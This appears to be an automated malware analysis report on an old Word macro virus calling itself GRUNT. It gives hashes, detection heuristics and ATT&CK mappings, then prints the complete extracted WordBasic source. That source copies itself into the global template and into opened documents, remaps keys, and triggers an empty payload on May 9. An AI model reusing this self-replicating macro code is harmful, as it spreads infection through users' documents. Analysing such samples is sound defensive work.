Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 29bf0cb53481f0e4…

MALICIOUS

Office (OLE)

32.0 KB Created: 2001-12-08 05:32:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 0ffbbf5ab5011a4453a60c1012642f2c SHA-1: 645a968f0428a15ba5623876eb5884daec2a21bc SHA-256: 29bf0cb53481f0e457f9d18486ae7d3a8207960a7b2391d7c43a5d99af1338e0
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains legacy WordBasic macros, indicated by the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic. The macro code attempts to copy itself to global macros and potentially establish persistence. The embedded document body text explicitly identifies itself as the 'GRUNT Virus' from 1996, suggesting a historical or variant malware.

Heuristics 3

  • ClamAV: Doc.Trojan.NJ-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.NJ-1
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3418 bytes
SHA-256: 8f93148da57b65c21b0a0410c9df2f6a361e3452a019147292590e49152684a8
Detection
ClamAV: Doc.Trojan.NJ-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "XxGRUNTxX2"

Public Sub MAIN()
Dim VM1$
Dim VM2$
Dim NJ$
Dim F$
Dim A$
On Error GoTo -1: On Error GoTo Finish

WordBasic.ToolsCustomizeKeyboard KeyCode:=69, Category:=2, Name:="XxGRUNTxX1", Add:=1, Context:=0
WordBasic.ToolsCustomizeKeyboard KeyCode:=69, Category:=2, Name:="XxGRUNTxX1", Add:=1, Context:=1
WordBasic.ToolsCustomizeKeyboard KeyCode:=73, Category:=2, Name:="XxGRUNTxX2", Add:=1, Context:=0
WordBasic.ToolsCustomizeKeyboard KeyCode:=73, Category:=2, Name:="XxGRUNTxX2", Add:=1, Context:=1

VM1$ = WordBasic.[WindowName$]() + ":XxGRUNTxX1"
VM2$ = WordBasic.[WindowName$]() + ":XxGRUNTxX2"

NJ$ = WordBasic.[MacroFileName$]("XxGRUNTxX1")
F$ = WordBasic.[FileNameInfo$](NJ$, 5)

If VInstalled = 1 Then
    GoTo Finish
Else
    On Error Resume Next
    WordBasic.MacroCopy VM1$, "Global:XxGRUNTxX1", 1
    WordBasic.MacroCopy VM2$, "Global:XxGRUNTxX2", 1
    WordBasic.FileSaveAll 1, 1
End If

Finish:
A$ = WordBasic.[FileName$]()
If A$ = "" Then
    GoTo Finito
Else
    WordBasic.Insert "i"
End If

Finito:
If WordBasic.Month(WordBasic.Now()) = 5 And WordBasic.Day(WordBasic.Now()) = 9 Then
    WordBasic.Call "Payload"
Else
    GoTo EndOne
End If

EndOne:
End Sub

Private Function VInstalled()
Dim i
    VInstalled = 0
    If WordBasic.CountMacros(0) > 0 Then
        For i = 1 To WordBasic.CountMacros(0)
            If WordBasic.[MacroName$](i, 0) = "XxGRUNTxX1" Then
                VInstalled = 1
            End If
        Next i
    End If
End Function

Attribute VB_Name = "XxGRUNTxX1"

Public Sub MAIN()
Dim VM1$
Dim VM2$
Dim A$
On Error GoTo -1: On Error GoTo Finish

WordBasic.ToolsCustomizeKeyboard KeyCode:=69, Category:=2, Name:="XxGRUNTxX1", Add:=1, Context:=0
WordBasic.ToolsCustomizeKeyboard KeyCode:=69, Category:=2, Name:="XxGRUNTxX1", Add:=1, Context:=1
WordBasic.ToolsCustomizeKeyboard KeyCode:=73, Category:=2, Name:="XxGRUNTxX2", Add:=1, Context:=0
WordBasic.ToolsCustomizeKeyboard KeyCode:=73, Category:=2, Name:="XxGRUNTxX2", Add:=1, Context:=1

VM1$ = WordBasic.[WindowName$]() + ":XxGRUNTxX1"
VM2$ = WordBasic.[WindowName$]() + ":XxGRUNTxX2"

If VInstalled = 1 Then
    GoTo Finish
Else
    On Error Resume Next
    WordBasic.FileSaveAs Format:=1
    WordBasic.MacroCopy "Global:XxGRUNTxX1", VM1$, 1
    WordBasic.MacroCopy "Global:XxGRUNTxX2", VM2$, 1
    WordBasic.FileSaveAll 1, 0
End If

Finish:
A$ = WordBasic.[FileName$]()
If A$ = "" Then
    GoTo Finito
Else
    WordBasic.Insert "e"
End If

Finito:
If WordBasic.Month(WordBasic.Now()) = 5 And WordBasic.Day(WordBasic.Now()) = 9 Then
    Payload
Else
    GoTo EndOne
End If

EndOne:
End Sub

Private Function VInstalled()
Dim i
    VInstalled = 0
    If WordBasic.CountMacros(1) > 0 Then
        For i = 1 To WordBasic.CountMacros(1)
            If WordBasic.[MacroName$](i, 1) = "XxGRUNTxX1" Then
                VInstalled = 1
            End If
        Next i
    End If
End Function

Private Sub Payload()

Rem A Virus from Nightmare Joker's Demolition Kit!


End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.